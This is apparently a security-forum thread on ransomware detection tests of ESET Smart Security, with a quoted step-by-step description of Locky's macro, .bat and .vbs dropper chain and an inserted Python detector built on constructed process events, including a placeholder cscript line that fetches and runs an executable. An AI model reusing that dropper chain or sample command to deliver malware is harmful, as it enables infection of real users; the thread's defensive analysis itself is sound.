Ransomware Test Results


Ref.: https://avlab.pl/sites/default/files/68files/ENG_2016_ransomware.pdf

For testing, we used 28 malicious software files of crypto ransomware. Among others there were: Cerber, CryptXXX, DetoxCrypto, Hitler Ransomware, HolyCrypt, Locky, Numecod, Petya, Jigsaw, Vipasana, Stampado and many others. The study included the total amount of 28 samples collected in a collaboration with independent researchers.

Test Results

Smart Security ver. 9 - 25/28

Smart Security ver. 10 beta - 27/28

Summary

Upgrade to ver. 10 ASAP. Perhaps Eset could have them retest w/final of ver. 10?


Also noteworthy is that the vast majority of ransomware is delivered via e-mail, primarily in attachments. The overwhelming majority of ransomware delivered this way is Locky, as noted below. It would be illuminating to see a test of Eset's Internet/Smart Security client e-mail protection against Locky.


According to the 2016 Verizon DBIR, email is the #1 delivery channel for malware. And what percentage of that malware delivered over email is ransomware? According to Proofpoint, over 96 percent.


Ref: https://blog.barkly.com/ransomware-attacks-bypassing-antivirus#0

Edited by itman

In regards to Locky ransomware, there are variants of it that begin their infection process using .bat scripts. I would like to know if Eset's ver. 10 script protection includes monitoring of cmd.exe, which can run hidden, and conhost.exe.

Link to post
Share on other sites
  • Administrators

I don't recall seeing Locky started by batch files. It's mainly js or vbs files that are spread by spammed email and when run, they download Locky's binary and execute it.


FYI.

After some additional deobfuscation on the VBA macro I combined the 3 parts to reveal the full script and the actions performed.

1. VBA macro creates file %temp%\arra.bat
2. Decodes and writes the values of textbox1 and textbox2 to arra.bat
3. Executes %temp%\arra.bat
3.1. Arra.bat in turn creates %tmp%\dasdee.vbs
3.2. Echoes the script contents to the dasdee.vbs script
3.3. Executes dasdee.vbs using cscript
3.3.1. dasdee.vbs performs a GET request to the http address passed in parameter %0% and saves the response to the location in parameter %1%
3.4. The bat file then executes the file saved by the vbs script, deletes the vbs script and deletes itself.


Ref.: https://www.sternsecurity.com/blog/locky-ransomware-analysis

Edited by itman
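As an added defender-side example (not code from the post, from the Stern Security analysis it cites, or from ESET): a small Python routine that walks process-creation events and flags the chain described above, an Office application spawning cmd.exe on a .bat in %temp%, which in turn runs a .vbs through cscript/wscript and launches the dropped executable. The event field names, sample paths and pids are assumptions constructed for the example.

```python
import re
# Constructed process-creation events modelled on the chain above (macro -> %temp%\arra.bat
# -> cscript %tmp%\dasdee.vbs -> dropped exe); not real telemetry. pids 200/201 are benign.
T = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Office\WINWORD.EXE", "cmdline": "WINWORD.EXE invoice.doc"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": rf"cmd /c {T}\arra.bat"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": rf"cscript %tmp%\dasdee.vbs http://example.invalid/p {T}\out.exe"},
    {"pid": 103, "ppid": 101, "image": rf"{T}\out.exe", "cmdline": rf"{T}\out.exe"},
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
# A .bat/.vbs/.exe path under %temp%, %tmp% or an expanded ...\Temp\ directory.
TEMP_FILE_RE = re.compile(r'(?:%te?mp%|\\Temp)\\[^\\\s"]+\.(bat|vbs|exe)', re.IGNORECASE)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def _temp_file_types(text):
    # Extensions ({'bat', 'vbs', 'exe'}) of files referenced under a temp directory.
    return {m.group(1).lower() for m in TEMP_FILE_RE.finditer(text)}

def find_macro_dropper_chains(events):
    # Flag each cmd.exe spawned by an Office app and record the dropper stages it shows.
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if _basename(e["image"]) != "cmd.exe" or parent is None or _basename(parent["image"]) not in OFFICE_APPS:
            continue
        stages = []
        if "bat" in _temp_file_types(e["cmdline"]):
            stages.append("Office app spawned cmd.exe on a .bat in %temp%")
        for child in children.get(e["pid"], []):
            name = _basename(child["image"])
            if name in SCRIPT_HOSTS and "vbs" in _temp_file_types(child["cmdline"]):
                stages.append(f"cmd.exe ran a .vbs from %tmp% via {name}")
            elif "exe" in _temp_file_types(child["image"]):
                stages.append("cmd.exe launched an executable dropped in %temp%")
        if stages:
            findings.append({"pid": e["pid"], "stages": stages})
    return findings
```

Run against the sample events it reports pid 101 with all three stages and stays silent on the explorer-launched cmd.exe; in practice the same logic applies to Sysmon or EDR process-creation records once the field names are mapped.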

Noteworthy is that Microsoft has "beefed up" macro protection in Office 2016 and recently 2013. So cmd.exe protection is not that critical in those versions. However, there are still enterprises and individuals using pre-2013 Pro. or non-Pro. versions of Office.

  • 4 weeks later...
  • Administrators

The latest TorrentLocker :)


Baidu         Win32.Trojan.WisdomEyes.16070401.9500.9928
ESET-NOD32    a variant of Win32/Injector.DIOL
CrowdStrike   malicious_confidence_89% (D)

3/56 on 2016-12-09 09:41:16

  • 3 weeks later...

Here's one for Eset to research: https://malwaretips.com/threads/self-made-ransomware-vs-antivirus-products.66903/

Basically a 0-day that remained so for quite a while. Introduced into the wild on 12/12. Nine days later, only 12 vendors on VirusTotal had a signature for it, and Eset was not one of them. As noted in the tester's comments on Malwaretips, Eset Smart Security failed to detect it.
